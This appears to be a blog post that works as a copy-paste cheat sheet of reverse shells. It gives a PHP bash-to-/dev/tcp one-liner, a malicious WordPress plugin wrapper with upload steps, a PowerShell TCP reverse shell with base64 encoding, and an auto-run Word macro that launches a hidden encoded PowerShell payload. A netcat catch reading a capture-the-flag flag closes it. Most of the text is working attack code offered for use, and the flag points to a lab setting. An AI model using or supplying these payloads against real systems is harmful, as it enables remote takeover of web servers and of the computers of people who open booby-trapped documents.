Post

Reverse shells

Reverse shells

(a work in progress list of some handy reverse shells)

ℹ️ Some nifty links

Opening

PHP

A generic PHP reverse shell where you can/should swap out the listening IP address and port:

1
2
3
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>

WordPress

For a WordPress plugin, you need to add a bit more info for it to load as a “valid” plugin as outlined in the plugin development docs .

1
2
3
4
5
6
7
8
9
10
11
<?php
/**
* Plugin Name: reverse shell plugin
* Description: opens a reverse shell with bash
* Version: 0.1
* Author: some-natalie
* Author URI: https://some-natalie.dev
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>

Zip that PHP file, then upload the zipped file as a plugin.

This lovely malicious WordPress plugin generator works well on some versions of WordPress and not others. The boring one above works a bit more uniformally, but is nowhere near as full of features.

Powershell

Edit the IP address and port, then encode it to base64 for easy copy/paste:

1
2
3
4
5
6
7
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.236",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText = [Convert]::ToBase64String($Bytes)

$EncodedText

Office Macro

Here’s a basic macro that invokes powercat to create a reverse shell. Getting everything right for that payload is tedious, so I made a quick script (payload.py ) to create the base64-encoded payload for a simple reverse shell. Then paste that content into the macro below. Make sure to save the macro attached to the document (not the workspace). Use .docm or .doc for Word, etc. for other formats.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    ' edit the payload.py inputs to produce the right output here
    Str = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"
        Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"
        Str = Str + "CAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGw"
        Str = Str + "A"
    CreateObject("Wscript.Shell").Run Str
End Sub

Catching

netcat

1
2
3
4
5
6
ᐅ nc -l 8080
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8b8f280a8848:/var/www/html/wp-admin$ cat /tmp/flag
cat /tmp/flag
flag{a sneaky flag has appeared}
This post is licensed under CC BY 4.0 by the author.